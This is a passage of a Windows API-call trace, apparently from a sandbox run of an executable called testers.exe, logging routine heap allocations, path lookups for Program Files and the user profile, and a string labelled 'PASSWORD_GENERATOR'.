0x76a838 [0071.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0071.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690530 | out: hHeap=0x650000) returned 1 [0071.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7d8 | out: hHeap=0x650000) returned 1 [0071.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a520 | out: hHeap=0x650000) returned 1 [0071.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cc08 | out: hHeap=0x650000) returned 1 [0071.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690500 | out: hHeap=0x650000) returned 1 [0071.681] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cc08 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a520 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690500 [0071.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a520 | out: hHeap=0x650000) returned 1 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cb18 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a520 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7d8 [0071.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690530 [0071.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7d8 | out: hHeap=0x650000) returned 1 [0071.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68caa0 [0071.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7d8 [0071.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690510 [0071.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691578 [0071.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690540 [0071.682] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x61ed98 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0071.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a850 [0071.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690510 | out: hHeap=0x650000) returned 1 [0071.683] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x60f3fc, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0071.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690510 [0071.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cb68 [0071.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a820 [0071.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0071.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690540 | out: hHeap=0x650000) returned 1 [0071.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a850 | out: hHeap=0x650000) returned 1 [0071.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7d8 | out: hHeap=0x650000) returned 1 [0071.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68caa0 | out: hHeap=0x650000) returned 1 [0071.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690530 | out: hHeap=0x650000) returned 1 [0071.683] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68caa0 [0071.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7d8 [0071.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690530 [0071.683] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7d8 | out: hHeap=0x650000) returned 1 [0071.683] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68caf0 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7d8 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a850 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690540 [0071.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a850 | out: hHeap=0x650000) returned 1 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cb40 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a850 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690550 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691578 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904d0 [0071.684] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x61efb8, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a808 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904b0 [0071.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0071.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904d0 | out: hHeap=0x650000) returned 1 [0071.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690550 | out: hHeap=0x650000) returned 1 [0071.684] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x60f3fc, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690550 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770f28 [0071.684] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7f0 [0071.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0071.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904b0 | out: hHeap=0x650000) returned 1 [0071.684] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a808 | out: hHeap=0x650000) returned 1 [0071.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a850 | out: hHeap=0x650000) returned 1 [0071.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cb40 | out: hHeap=0x650000) returned 1 [0071.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690540 | out: hHeap=0x650000) returned 1 [0071.685] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cb40 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a850 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690540 [0071.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a850 | out: hHeap=0x650000) returned 1 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cc30 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a850 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a808 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6904b0 [0071.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a808 | out: hHeap=0x650000) returned 1 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cc58 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a808 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6904d0 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691578 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904f0 [0071.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a790 [0071.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0071.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904f0 | out: hHeap=0x650000) returned 1 [0071.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904d0 | out: hHeap=0x650000) returned 1 [0071.685] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x60f3fc, cchBuffer=0x7fff | out: lpszShortPath="testers.exe") returned 0xb [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904d0 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cc80 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6e8 [0071.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a790 | out: hHeap=0x650000) returned 1 [0071.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a808 | out: hHeap=0x650000) returned 1 [0071.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cc58 | out: hHeap=0x650000) returned 1 [0071.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904b0 | out: hHeap=0x650000) returned 1 [0071.686] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cc58 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a808 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904b0 [0071.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a808 | out: hHeap=0x650000) returned 1 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cca8 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a808 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a790 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6904f0 [0071.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a790 | out: hHeap=0x650000) returned 1 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ccd0 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a790 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6904c0 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x691578 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904e0 [0071.686] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a5c8 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904e0 | out: hHeap=0x650000) returned 1 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904c0 | out: hHeap=0x650000) returned 1 [0071.687] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpszShortPath=0x60f3fc, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop\\testers.exe") returned 0x25 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904c0 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3270 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a568 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a5c8 | out: hHeap=0x650000) returned 1 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a790 | out: hHeap=0x650000) returned 1 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ccd0 | out: hHeap=0x650000) returned 1 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6904f0 | out: hHeap=0x650000) returned 1 [0071.687] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ccd0 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a790 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6904f0 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a5c8 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a580 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6904e0 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a580 | out: hHeap=0x650000) returned 1 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690520 [0071.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770e80 [0071.687] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x770e80 | out: hHeap=0x650000) returned 1 [0071.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690520 | out: hHeap=0x650000) returned 1 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ccf8 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690520 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd20 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a580 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690560 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a5f8 [0071.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690560 | out: hHeap=0x650000) returned 1 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690560 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a598 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690570 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a5b0 [0071.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690570 | out: hHeap=0x650000) returned 1 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a5e0 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd48 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a718 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690570 [0071.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a718 | out: hHeap=0x650000) returned 1 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd70 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a718 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a730 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd98 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690590 [0071.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a778 | out: hHeap=0x650000) returned 1 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cdc0 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a748 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0071.688] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cde8 [0071.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7a8 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6905a0 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a760 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a700 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905b0 [0071.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905b0 | out: hHeap=0x650000) returned 1 [0071.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a700 | out: hHeap=0x650000) returned 1 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6905b0 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x691578 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905c0 [0071.689] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905d0 [0071.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905d0 | out: hHeap=0x650000) returned 1 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a700 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6a0 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6905d0 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905e0 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6b8 [0071.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905e0 | out: hHeap=0x650000) returned 1 [0071.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905e0 [0071.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905e0 | out: hHeap=0x650000) returned 1 [0071.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6a0 | out: hHeap=0x650000) returned 1 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3218 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6b8 | out: hHeap=0x650000) returned 1 [0071.690] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905e0 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905e0 | out: hHeap=0x650000) returned 1 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6b8 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6a0 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6905e0 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905f0 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905f0 | out: hHeap=0x650000) returned 1 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905f0 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905f0 | out: hHeap=0x650000) returned 1 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b4b0 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0071.690] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6905f0 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6905f0 | out: hHeap=0x650000) returned 1 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ce10 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6905f0 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ce38 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a640 [0071.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0071.690] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ce60 [0071.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690610 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690610 | out: hHeap=0x650000) returned 1 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690610 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ce88 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7c0 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690620 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a868 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690620 | out: hHeap=0x650000) returned 1 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a880 [0071.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690620 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690620 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690620 | out: hHeap=0x650000) returned 1 [0071.691] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x61efac | out: lpSystemTimeAsFileTime=0x61efac*(dwLowDateTime=0xc84e7ae0, dwHighDateTime=0x1d661bd)) [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a868 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a898 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a880 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8b0 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ce88 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690610 | out: hHeap=0x650000) returned 1 [0071.691] PeekMessageW (in: lpMsg=0x61f26c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f26c) returned 0 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690620 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a898 | out: hHeap=0x650000) returned 1 [0071.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ceb0 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9508 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690630 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690620 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690620 | out: hHeap=0x650000) returned 1 [0071.692] HeapFree (in: hHeap=0x650000, 